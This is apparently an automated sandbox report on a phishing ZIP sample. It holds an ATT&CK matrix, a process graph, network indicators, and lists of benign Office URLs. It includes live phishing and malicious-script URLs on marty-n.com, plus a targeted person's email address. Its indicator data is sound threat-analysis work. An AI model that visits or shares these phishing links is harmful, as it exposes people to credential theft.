          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformationJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder          		1
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Process Discovery          		Remote Services1
          Clipboard Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          Registry Run Keys / Startup Folder          		1
          Modify Registry          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		1
          Process Injection          		Security Account Manager14
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Rundll32          		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542420 Sample: Rob.Kuster@stonhard.com.zip Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Antivirus detection for URL or domain 2->35 37 6 other signatures 2->37 7 OUTLOOK.EXE 510 149 2->7         started        9 notepad.exe 5 2->9         started        11 rundll32.exe 2->11         started        process3 process4 13 chrome.exe 8 7->13         started        16 ai.exe 7->16         started        dnsIp5 27 192.168.2.16, 138, 443, 49700 unknown unknown 13->27 29 239.255.255.250 unknown Reserved 13->29 18 chrome.exe 13->18         started        process6 dnsIp7 21 marty-n.com 185.45.66.155, 443, 49735, 49736 SUPERHOSTING_ASBG Bulgaria 18->21 23 s-part-0017.t-0009.t-msedge.net 13.107.246.45, 443, 49744, 49745 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->23 25 10 other IPs or domains 18->25

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=#cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=100%SlashNextCredential Stealing type: Phishing & Social Engineering
          https://api.diagnosticssdf.office.com0%URL Reputationsafe
          https://login.microsoftonline.com/0%URL Reputationsafe
          https://shell.suite.office.com:14430%URL Reputationsafe
          https://designerapp.azurewebsites.net0%URL Reputationsafe
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize0%URL Reputationsafe
          https://autodiscover-s.outlook.com/0%URL Reputationsafe
          https://useraudit.o365auditrealtimeingestion.manage.office.com0%URL Reputationsafe
          https://outlook.office365.com/connectors0%URL Reputationsafe
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          https://api.addins.omex.office.net/appinfo/query0%URL Reputationsafe
          https://clients.config.office.net/user/v1.0/tenantassociationkey0%URL Reputationsafe
          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://lookup.onenote.com/lookup/geolocation/v10%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0%URL Reputationsafe
          https://api.powerbi.com/v1.0/myorg/imports0%URL Reputationsafe
          https://cloudfiles.onenote.com/upload.aspx0%URL Reputationsafe
          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
          https://entitlement.diagnosticssdf.office.com0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
          https://canary.designerapp.0%URL Reputationsafe
          https://ic3.teams.office.com0%URL Reputationsafe
          https://www.yammer.com0%URL Reputationsafe
          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies0%URL Reputationsafe
          https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive0%URL Reputationsafe
          https://cr.office.com0%URL Reputationsafe
          https://messagebroker.mobile.m365.svc.cloud.microsoft0%URL Reputationsafe
          https://portal.office.com/account/?ref=ClientMeControl0%URL Reputationsafe
          https://clients.config.office.net/c2r/v1.0/DeltaAdvisory0%URL Reputationsafe
          https://edge.skype.com/registrar/prod0%URL Reputationsafe
          https://graph.ppe.windows.net0%URL Reputationsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://tasks.office.com0%URL Reputationsafe
          https://officeci.azurewebsites.net/api/0%URL Reputationsafe
          https://sr.outlook.office.net/ws/speech/recognize/assistant/work0%URL Reputationsafe
          https://api.scheduler.0%URL Reputationsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://api.aadrm.com0%URL Reputationsafe
          https://edge.skype.com/rps0%URL Reputationsafe
          https://globaldisco.crm.dynamics.com0%URL Reputationsafe
          https://messaging.engagement.office.com/0%URL Reputationsafe
          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://api.diagnosticssdf.office.com/v2/feedback0%URL Reputationsafe
          https://api.powerbi.com/v1.0/myorg/groups0%URL Reputationsafe
          https://web.microsoftstream.com/video/0%URL Reputationsafe
          https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://graph.windows.net0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://analysis.windows.net/powerbi/api0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://substrate.office.com0%URL Reputationsafe
          https://outlook.office365.com/autodiscover/autodiscover.json0%URL Reputationsafe
          https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios0%URL Reputationsafe
          https://consent.config.office.com/consentcheckin/v1.0/consents0%URL Reputationsafe
          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0%URL Reputationsafe
          https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices0%URL Reputationsafe
          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0%URL Reputationsafe
          https://safelinks.protection.outlook.com/api/GetPolicy0%URL Reputationsafe
          https://ncus.contentsync.0%URL Reputationsafe
          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/0%URL Reputationsafe
          http://weather.service.msn.com/data.aspx0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://officepyservice.office.net/service.functionality0%URL Reputationsafe
          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks0%URL Reputationsafe
          https://templatesmetadata.office.net/0%URL Reputationsafe
          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios0%URL Reputationsafe
          https://messaging.lifecycle.office.com/0%URL Reputationsafe
          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml0%URL Reputationsafe
          https://mss.office.com0%URL Reputationsafe
          https://pushchannel.1drv.ms0%URL Reputationsafe
          https://management.azure.com0%URL Reputationsafe
          https://outlook.office365.com0%URL Reputationsafe
          https://wus2.contentsync.0%URL Reputationsafe
          https://incidents.diagnostics.office.com0%URL Reputationsafe
          https://clients.config.office.net/user/v1.0/ios0%URL Reputationsafe
          https://make.powerautomate.com0%URL Reputationsafe
          https://api.addins.omex.office.net/api/addins/search0%URL Reputationsafe
          https://insertmedia.bing.office.net/odc/insertmedia0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          marty-n.com
          		185.45.66.155
          		truetrue
            		unknown
            d2vgu95hoyrpkh.cloudfront.net
            		18.245.31.78
            		truefalse
              		unknown
              cs837.wac.edgecastcdn.net
              		192.229.133.221
              		truefalse
                		unknown
                s-part-0017.t-0009.t-msedge.net
                		13.107.246.45
                		truefalse
                  		unknown
                  sni1gl.wpc.omegacdn.net
                  		152.199.21.175
                  		truefalse
                    		unknown
                    www.google.com
                    		142.250.186.164
                    		truefalse
                      		unknown
                      aadcdn.msftauth.net
                      		unknown
                      		unknownfalse
                        		unknown
                        www.w3schools.com
                        		unknown
                        		unknownfalse
                          		unknown
                          cdn.socket.io
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://www.w3schools.com/w3css/4/w3.cssfalse
                              		unknown
                              https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                		unknown
                                https://mwh06prdapp02-canary-opaph.netmon.azure.com/apc/trans.gif?42ef467e5f582ca56847c0384416bf70false
                                  		unknown
                                  https://marty-n.com/o/jsnom.jstrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://api.diagnosticssdf.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://login.microsoftonline.com/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://shell.suite.office.com:14438C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://designerapp.azurewebsites.net8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://autodiscover-s.outlook.com/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://useraudit.o365auditrealtimeingestion.manage.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://outlook.office365.com/connectors8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.entity.8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.addins.omex.office.net/appinfo/query8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://clients.config.office.net/user/v1.0/tenantassociationkey8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://login.windows.localnullOUTLOOK_16_0_16827_20130-20241025T1621410419-7072.etl.3.drfalse
                                      		unknown
                                      https://powerlift.acompli.net8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://rpsticket.partnerservices.getmicrosoftkey.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://lookup.onenote.com/lookup/geolocation/v18C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://cortana.ai8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.powerbi.com/v1.0/myorg/imports8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://cloudfiles.onenote.com/upload.aspx8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://entitlement.diagnosticssdf.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.aadrm.com/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://canary.designerapp.8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ic3.teams.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.yammer.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.microsoftstream.com/api/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                        		unknown
                                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffcchromecache_90.17.dr, chromecache_85.17.drfalse
                                          		unknown
                                          https://cr.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                            		unknown
                                            https://messagebroker.mobile.m365.svc.cloud.microsoft8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://otelrules.svc.static.microsoft8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              		unknown
                                              https://portal.office.com/account/?ref=ClientMeControl8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://clients.config.office.net/c2r/v1.0/DeltaAdvisory8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://edge.skype.com/registrar/prod8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://graph.ppe.windows.net8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://res.getmicrosoftkey.com/api/redemptionevents8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://powerlift-frontdesk.acompli.net8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://tasks.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://officeci.azurewebsites.net/api/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://api.scheduler.8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://my.microsoftpersonalcontent.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                		unknown
                                                https://store.office.cn/addinstemplate8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://api.aadrm.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://edge.skype.com/rps8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  		unknown
                                                  https://globaldisco.crm.dynamics.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://messaging.engagement.office.com/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://dev0-api.acompli.net/autodetect8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.odwebp.svc.ms8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.diagnosticssdf.office.com/v2/feedback8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.powerbi.com/v1.0/myorg/groups8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://web.microsoftstream.com/video/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.addins.store.officeppe.com/addinstemplate8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://graph.windows.net8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://dataservice.o365filtering.com/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://officesetup.getmicrosoftkey.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://analysis.windows.net/powerbi/api8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://prod-global-autodetect.acompli.net/autodetect8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://substrate.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://outlook.office365.com/autodiscover/autodiscover.json8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://consent.config.office.com/consentcheckin/v1.0/consents8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://cdn.socket.io/4.6.0/socket.io.min.jschromecache_90.17.dr, chromecache_85.17.drfalse
                                                    		unknown
                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://d.docs.live.net8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                      		unknown
                                                      https://safelinks.protection.outlook.com/api/GetPolicy8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ncus.contentsync.8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        		unknown
                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://weather.service.msn.com/data.aspx8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://apis.live.net/v5.0/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://officepyservice.office.net/service.functionality8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://templatesmetadata.office.net/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://messaging.lifecycle.office.com/8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://mss.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://pushchannel.1drv.ms8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://management.azure.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://outlook.office365.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://wus2.contentsync.8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://incidents.diagnostics.office.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://clients.config.office.net/user/v1.0/ios8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://make.powerautomate.com8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.addins.omex.office.net/api/addins/search8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://insertmedia.bing.office.net/odc/insertmedia8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        185.45.66.155
                                                        		marty-n.comBulgaria
                                                        		201200SUPERHOSTING_ASBGtrue
                                                        13.107.246.45
                                                        		s-part-0017.t-0009.t-msedge.netUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        18.245.31.78
                                                        		d2vgu95hoyrpkh.cloudfront.netUnited States
                                                        		16509AMAZON-02USfalse
                                                        192.229.133.221
                                                        		cs837.wac.edgecastcdn.netUnited States
                                                        		15133EDGECASTUSfalse
                                                        18.245.31.33
                                                        		unknownUnited States
                                                        		16509AMAZON-02USfalse
                                                        239.255.255.250
                                                        		unknownReserved
                                                        		unknownunknownfalse
                                                        142.250.186.164
                                                        		www.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        152.199.21.175
                                                        		sni1gl.wpc.omegacdn.netUnited States
                                                        		15133EDGECASTUSfalse

                                                        Private

                                                        IP
                                                        192.168.2.16

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1542420
                                                        Start date and time:2024-10-25 22:21:03 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 11s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:19
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Rob.Kuster@stonhard.com.zip
                                                        Detection:MAL
                                                        Classification:mal100.phis.winZIP@20/64@16/9
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .zip

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
